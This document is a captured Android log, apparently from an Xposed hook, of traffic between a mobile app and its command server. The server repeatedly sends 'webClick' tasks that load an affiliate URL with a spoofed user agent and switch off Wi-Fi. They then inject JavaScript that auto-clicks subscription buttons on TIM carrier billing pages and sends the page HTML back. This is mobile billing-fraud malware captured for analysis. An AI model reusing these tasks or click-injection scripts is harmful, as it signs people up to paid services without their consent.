11-19 22:45:15.811 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"578956\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:45:15 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 22:45:22.775 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-19 22:45:22.778 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"578956\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:45:15 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 22:46:22.828 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:44:15 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"578956\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"22:45:15 2017.11.19\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-19 22:46:22.841 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:46:28.700 I/Xposed (18830): [+] SERVER: []
11-19 22:46:28.707 I/Xposed (18830): [+] SERVER: [{"id":886798,"name":"OK"}]
11-19 22:47:23.006 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:47:24.295 I/Xposed (18830): [+] SERVER: []
11-19 22:48:22.888 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:48:23.585 I/Xposed (18830): [+] SERVER: []
11-19 22:49:22.916 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 22:49:23.805 I/Xposed (18830): [+] SERVER: [{"id":303918,"name":"interval","params":{"interval":1800}}]
11-19 22:49:23.862 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"22:49:23 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"303918\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 22:49:24.046 I/Xposed (18830): [+] SERVER: [{"id":152768,"name":"OK"}]
11-19 23:20:13.588 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 23:20:14.893 I/Xposed (18830): [+] SERVER: [{"id":925191,"name":"interval","params":{"interval":1800}}]
11-19 23:20:14.947 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"23:20:14 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"925191\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 23:20:15.182 I/Xposed (18830): [+] SERVER: [{"id":904339,"name":"OK"}]
11-19 23:50:15.016 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-19 23:50:16.005 I/Xposed (18830): [+] SERVER: [{"id":983193,"name":"interval","params":{"interval":1800}}]
11-19 23:50:16.048 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"23:50:16 2017.11.19\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"983193\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-19 23:50:16.277 I/Xposed (18830): [+] SERVER: [{"id":251873,"name":"OK"}]
11-20 00:21:24.323 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:21:25.433 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a1211f508274","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":901451,"name":"interval","params":{"interval":60}}]
11-20 00:22:25.727 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:22:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 00:22:26.301 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:22:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"00:22:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 00:22:26.353 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:22:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"00:22:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"00:22:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"901451\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 00:23:26.409 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:22:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"00:22:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"00:22:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"901451\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 00:23:26.421 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:23:27.232 I/Xposed (18830): [+] SERVER: []
11-20 00:23:27.241 I/Xposed (18830): [+] SERVER: [{"id":373026,"name":"OK"}]
11-20 00:24:26.434 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:24:27.396 I/Xposed (18830): [+] SERVER: []
11-20 00:25:26.459 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:25:27.396 I/Xposed (18830): [+] SERVER: []
11-20 00:26:26.507 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:26:27.635 I/Xposed (18830): [+] SERVER: []
11-20 00:27:26.521 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:27:27.516 I/Xposed (18830): [+] SERVER: [{"id":184478,"name":"interval","params":{"interval":1800}}]
11-20 00:27:27.572 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:27:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"184478\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 00:27:27.813 I/Xposed (18830): [+] SERVER: [{"id":634710,"name":"OK"}]
11-20 00:57:45.123 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 00:57:45.967 I/Xposed (18830): [+] SERVER: [{"id":198827,"name":"interval","params":{"interval":1800}}]
11-20 00:57:46.009 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"00:57:45 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"198827\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 00:57:46.237 I/Xposed (18830): [+] SERVER: [{"id":875366,"name":"OK"}]
11-20 01:27:46.106 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 01:27:47.275 I/Xposed (18830): [+] SERVER: [{"id":406589,"name":"interval","params":{"interval":1800}}]
11-20 01:27:47.320 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"01:27:47 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"406589\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 01:27:47.557 I/Xposed (18830): [+] SERVER: [{"id":715524,"name":"OK"}]
11-20 02:00:24.086 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:00:25.503 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a122928cb71d","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":147702,"name":"interval","params":{"interval":60}}]
11-20 02:01:25.790 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:01:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 02:01:26.345 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:01:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"02:01:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:01:26.401 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:01:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"02:01:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:01:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"147702\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:02:26.467 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:02:26.474 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:01:25 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n },\n {\n \"time\": \"02:01:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:01:26 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"147702\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:02:27.269 I/Xposed (18830): [+] SERVER: []
11-20 02:02:27.281 I/Xposed (18830): [+] SERVER: [{"id":295374,"name":"OK"}]
11-20 02:03:26.489 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:03:27.305 I/Xposed (18830): [+] SERVER: []
11-20 02:04:26.517 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:04:27.447 I/Xposed (18830): [+] SERVER: []
11-20 02:05:26.537 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:05:27.467 I/Xposed (18830): [+] SERVER: []
11-20 02:06:26.547 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:06:27.367 I/Xposed (18830): [+] SERVER: [{"id":655610,"name":"interval","params":{"interval":1800}}]
11-20 02:06:27.436 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:06:27 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"655610\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:06:27.707 I/Xposed (18830): [+] SERVER: [{"id":482746,"name":"OK"}]
11-20 02:36:27.611 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:36:29.146 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a12319c6f9ed","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":626612,"name":"interval","params":{"interval":60}}]
11-20 02:36:29.224 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:36:29.317 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"626612\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:37:29.490 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"626612\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:37:29 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 02:37:29.495 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":false,\"simReady\":true}"}
11-20 02:38:29.580 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:38:29.591 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"name\\\": \\\"webClick\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:36:29 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"626612\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n },\n {\n \"time\": \"02:37:29 2017.11.20\",\n \"type\": \"event\",\n \"data\": \"{\\n \\\"WiFi\\\": false,\\n \\\"simReady\\\": true,\\n \\\"type\\\": \\\"web.click.end\\\",\\n \\\"timeout\\\": true,\\n \\\"id\\\": \\\"7981200014110280\\\",\\n \\\"errorDescription\\\": \\\"internal: timeout connect\\\",\\n \\\"errorUrl\\\": \\\"null\\\",\\n \\\"loadProgress\\\": -1\\n}\"\n }\n]"}
11-20 02:38:30.398 I/Xposed (18830): [+] SERVER: []
11-20 02:38:30.956 I/Xposed (18830): [+] SERVER: [{"id":312460,"name":"OK"}]
11-20 02:39:29.584 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:39:35.467 I/Xposed (18830): [+] SERVER: []
11-20 02:40:29.614 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:40:30.456 I/Xposed (18830): [+] SERVER: []
11-20 02:41:29.631 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:41:30.486 I/Xposed (18830): [+] SERVER: []
11-20 02:42:29.672 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 02:42:30.575 I/Xposed (18830): [+] SERVER: [{"id":319973,"name":"interval","params":{"interval":1800}}]
11-20 02:42:30.631 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"reports","data":"[\n {\n \"time\": \"02:42:30 2017.11.20\",\n \"type\": \"response\",\n \"data\": \"{\\n \\\"id\\\": \\\"319973\\\",\\n \\\"name\\\": \\\"interval\\\",\\n \\\"result\\\": 0\\n}\"\n }\n]"}
11-20 02:42:30.865 I/Xposed (18830): [+] SERVER: [{"id":275076,"name":"OK"}]
11-20 03:12:49.893 I/Xposed (18830): [+] CLIENT: {"id":"667a7cf5-4da8-4388-b22b-ce6c4b7ef36b","type":"ping","data":"{\"WiFi\":true,\"simReady\":true}"}
11-20 03:12:56.224 I/Xposed (18830): [+] SERVER: [{"id":7981200014110280,"name":"webClick","params":{"start":"http://promfp.com/IT?sub_id_1=av&sub_id_3=KN40eUbaezjMIWuXKNo0mNbaKRjMIWuXeWJnKT2-0N&sub=8c18f189-311e-a3d0-b204-a123a27c0a96","timeout":"40","headers":{"X-Requested-With":""},"userAgent":"Mozilla/5.0 (Linux; Android 5.1; XT1032 Build/LMY47M.M005) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36","turnOffWifi":true,"disableLoadImage":true,"actions":[{"urlExp":".*hostingpagevas.com.*","js":"document.getElementById('saveLink').click();"},{"urlExp":".*vastracking.tim.it.*","js":"document.getElementById('actionLink').click();"},{"urlExp":".*","js":"console.log('send.to.server: task_id:1411-1' + window.location.href + ': ref: ' + document.referrer + ': ' + document.documentElement.innerHTML);"}],"end":["assdfasdfasdfasdf"]}},{"id":129903,"name":"interval","params":{"interval":60}}]
